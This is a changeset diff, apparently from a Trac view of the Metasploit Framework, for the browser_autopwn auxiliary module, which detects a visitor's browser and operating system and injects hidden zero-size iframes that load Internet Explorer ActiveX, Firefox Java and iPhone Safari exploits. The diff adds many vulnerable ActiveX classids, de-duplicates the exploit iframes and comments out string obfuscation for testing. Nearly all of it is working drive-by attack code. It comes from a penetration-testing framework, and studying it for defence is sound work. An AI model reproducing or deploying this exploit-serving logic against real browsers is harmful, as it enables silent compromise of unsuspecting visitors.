Changeset 5573
- Timestamp:
- 07/23/08 03:26:42 (3 months ago)
- Files:
Legend:
- Unmodified
- Added
- Removed
- Modified
- Copied
- Moved
framework3/trunk/modules/auxiliary/server/browser_autopwn.rb
r5571 r5573 117 117 init_exploit('exploit/windows/browser/novelliprint_getdriversettings') 118 118 119 # Works on default IE 5 and 6 119 # Works on default IE 6 120 # Doesn't work on Windows 2000 IE 5.0 120 121 # I'm pretty sure keyframe works on everything this works on, but since 121 122 # this doesn't need javascript, try it anyway. 122 123 # does not require javascript 123 124 init_exploit('exploit/windows/browser/ms03_020_ie_objecttype') 125 126 # requires javascript 127 init_exploit('exploit/windows/browser/ie_createobject') 124 128 125 129 # I'm pretty sure keyframe works on everything this works on and more, … … 176 180 record_detection(cli, request) 177 181 send_not_found(cli) 178 when %r{^#{datastore['URIPATH']}}: 182 when %r{^#{datastore['URIPATH']}\?}: 183 when %r{^#{datastore['URIPATH']}$}: 179 184 # 180 185 # This is the request for exploits. At this point we should at … … 220 225 221 226 objects = { 227 'DirectAnimation.PathControl' => @exploits['exploit/windows/browser/ms06_067_keyframe'].get_resource, 222 228 '{88d969c5-f192-11d4-a65f-0040963251e5}' => @exploits['exploit/windows/browser/ms06_071_xml_core'].get_resource, 223 229 '{36723F97-7AA0-11D4-8919-FF2D71D0D32C}' => @exploits['exploit/windows/browser/novelliprint_getdriversettings'].get_resource, 224 'DirectAnimation.PathControl' => @exploits['exploit/windows/browser/ms06_067_keyframe'].get_resource, 230 '{BD96C556-65A3-11D0-983A-00C04FC29E36}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, 231 '{BD96C556-65A3-11D0-983A-00C04FC29E30}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, 232 '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, 233 '{6414512B-B978-451D-A0D8-FCFDF33E833C}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, 234 '{06723E09-F4C2-43c8-8358-09FCD1DB0766}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, 235 '{639F725F-1B2D-4831-A9FD-874847682010}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, 236 '{BA018599-1DB3-44f9-83B4-461454C84BF8}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, 237 '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, 238 '{E8CCCDDF-CA28-496b-B050-6C07C962476B}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, 239 '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, 240 '{0006F033-0000-0000-C000-000000000046}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, 241 '{0006F03A-0000-0000-C000-000000000046}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, 225 242 } 226 243 hash_declaration = objects.map{ |k, v| "'#{k}', '#{v}'," }.join.chop 227 244 228 245 js = <<-ENDJS 246 229 247 #{js_os_detect} 230 248 #{js_base64} … … 264 282 url = Base64.encode(url); 265 283 document.write(url + "<br>"); 266 xml.open("GET", document.location + " /sessid=" + url, false);284 xml.open("GET", document.location + "?sessid=" + url, false); 267 285 xml.send(null); 268 286 } … … 276 294 277 295 if ("#{HttpClients::IE}" == detected_version.browser_name) { 278 document.write("This is IE<br />");296 //document.write("This is IE<br />"); 279 297 // object_list contains key-value pairs like 280 // {classid} => / path/to/exploit/for/classid298 // {classid} => /srvpath/to/exploit/for/classid 281 299 // and 282 // ActiveXname => / path/to/exploit/for/ActiveXname300 // ActiveXname => /srvpath/to/exploit/for/ActiveXname 283 301 var object_list = new Hash(#{hash_declaration}); 284 302 var vuln_obj; 303 var written_frames = new Array(); 285 304 286 305 // iterate through our list of exploits 287 document.write("I have " + object_list.length + " objects to test <br />");306 //document.write("I have " + object_list.length + " objects to test <br />"); 288 307 for (var current_item in object_list.items) { 289 308 //document.write("Testing for object " + current_item + " ... "); 290 vuln_obj = undefined; 309 // Don't write the same iframe more than once. This is 310 // only an issue with ie_createobject which uses a ton of 311 // different classids to perform the same exploit. 312 // Assumes that no url will be a substring of another url. 313 if (-1 != written_frames.toString().indexOf(object_list.items[current_item])) { 314 //document.write("Already wrote an iframe for " + object_list.items[current_item] +"<br>"); 315 continue; 316 } 317 vuln_obj = ''; 291 318 if (current_item.substring(0,1) == '{') { 319 //document.write("which is a clasid <br />"); 320 292 321 // classids are stored surrounded in braces for an easy way to tell 293 322 // them from ActiveX object names, so if it has braces, strip them 294 323 // out and create an object element with that classid 295 var obj_elem = document.createElement("object"); 296 297 //document.write("which is a clasid <br />"); 298 if (obj_elem) { 299 obj_elem.setAttribute("cl" + "as" + "sid", "cl" + "s" + "id" +":" + current_item.substring( 1, current_item.length - 1 ) ) ; 300 //document.write("bug1? <br />"); 301 obj_elem.setAttribute("id", current_item); 302 //document.write("bug2? <br />"); 303 vuln_obj = document.getElementById(current_item); 304 //document.write("bug4? <br />"); 305 } else { 306 document.write("createElement failed <br />"); 307 } 324 var vuln_obj = document.createElement("object"); 325 326 vuln_obj.setAttribute("classid", "clsid:" + current_item.substring( 1, current_item.length - 1 ) ) ; 308 327 } else { 309 document.write("which is an AXO <br />"); 328 //document.write("which is an AXO name <br />"); 329 310 330 // otherwise, try to create an AXO with that name 311 try { 312 vuln_obj = new ActiveXObject(current_item); 313 } catch(e){} 331 try { vuln_obj = new ActiveXObject(current_item); } catch(e){} 314 332 } 333 // This doesn't bloody work. vuln_obj is always something 334 // that evaluates to true but there doesn't seem to be any 335 // way of determining if it is actually an ActiveX object. 336 // Since we can't tell if it will work, we end up just sending 337 // all of the iframes; some of them don't work, some of them 338 // do and we get multiple shells. Junior Varsity. 315 339 if (vuln_obj) { 316 //document.write("It exists, making evil iframe <br />"); 317 //sploit_frame += '#{build_iframe("' + object_list.items[current_item] + '")}'; 318 sploit_frame += '<p>' + object_list.items[current_item] + '</p>'; 319 sploit_frame += '<iframe '; 320 sploit_frame += 'src="'+ object_list.items[current_item] +'" '; 321 sploit_frame += 'style="visibility:hidden" height="0" width="0" border="0"></iframe>'; 340 document.write("It exists, making evil iframe <br />"); 341 sploit_frame += '#{build_iframe("' + object_list.items[current_item] + '")}'; 342 // why the hell is there no array.push() in javascript? 343 written_frames[written_frames.length] = object_list.items[current_item]; 322 344 } else { 323 345 //document.write("It does NOT exist, skipping. <br />"); … … 326 348 } // if IE 327 349 else { 328 document.write("this is NOT MSIE<br />");350 //document.write("this is NOT MSIE<br />"); 329 351 if (window.navigator.javaEnabled && window.navigator.javaEnabled()) { 330 352 sploit_frame += '#{build_iframe(@exploits['exploit/multi/browser/mozilla_navigatorjava'].get_resource)}'; … … 333 355 sploit_frame += '#{build_iframe(@exploits['exploit/multi/browser/mozilla_compareto'].get_resource)}'; 334 356 } 357 // eventually this exploit will have an auto target and 358 // this check won't be necessary 335 359 if ("#{OperatingSystems::MAC_OSX}" == detected_version.os_name) { 336 360 if (location.QueryInterface) { … … 340 364 } 341 365 if (0 < sploit_frame.length) { 342 document.write("Conditions optimal, writing evil iframe(s) <br />");366 //document.write("Conditions optimal, writing evil iframe(s) <br />"); 343 367 document.write(sploit_frame); 344 368 } … … 353 377 'object_list', 'vuln_obj', 354 378 'obj_elem', 'sploit_frame', 379 'written_frames', 355 380 'detected_version' 356 381 ], … … 366 391 js.update_opts(js_os_detect.opts) 367 392 js.update_opts(js_base64.opts) 368 js.obfuscate({'Strings'=>true})393 #js.obfuscate({'Strings'=>true}) 369 394 370 395 # Since ms03_020 works without javascript and we can guarantee with 371 396 # conditional comments that it won't eat resources in non-IE browsers, 372 397 # go ahead and send it with all responses in case our detection failed. 398 # 399 # commented this out so i can test other exploits 373 400 body = <<-ENDHTML 374 401 <body id="#{js.sym('body_id')}"> 375 <!-- [if lt IE 7]> 402 <!-- 403 <!--[if lt IE 7]> 376 404 #{build_iframe(@exploits['exploit/windows/browser/ms03_020_ie_objecttype'].get_resource)} 377 405 <![endif]--> … … 379 407 380 408 response.body = ' <html> <head> <title> Loading </title> ' 381 response.body << ' <script type="text/javascript">' + js + ' </script> ' 382 response.body << ' </head> ' + body 383 409 response.body << ' <script language="javascript" type="text/javascript">' 410 response.body << "<!--\n" + js + ' //-->' 411 response.body << ' </script> </head> ' + body 412 413 # At this point in time all we have is the user agent detection. 414 # Consider moving the non-javascript exploits into the main body 415 # regardless of detected OS in case the user agent was spoofed. 384 416 case (get_target_os(cli)) 385 417 when OperatingSystems::WINDOWS … … 391 423 when OperatingSystems::MAC_OSX 392 424 if ('armle' == get_target_arch(cli)) 425 # Then it's an iPhone 393 426 response.body << build_iframe(@exploits['exploit/osx/armle/safari_libtiff'].get_resource) 394 427 end … … 399 432 end 400 433 434 # consider abstracting this out to a method (probably 435 # with a different name) of Auxiliary::Report or 436 # Exploit::Remote::HttpServer 401 437 def record_detection(cli, request) 402 438 os_name = nil … … 536 572 537 573 def build_iframe(resource) 538 #return "<p>#{resource}</p>" 539 return "<iframe src=\"#{resource}\" style=\"visibility:hidden\" height=\"0\" width=\"0\" border=\"0\"></iframe>" 574 ret = '' 575 ret << "<p>#{resource}</p>" 576 ret << "<iframe src=\"#{resource}\" style=\"visibility:hidden\" height=\"0\" width=\"0\" border=\"0\"></iframe>" 577 return ret 540 578 end 541 579 end
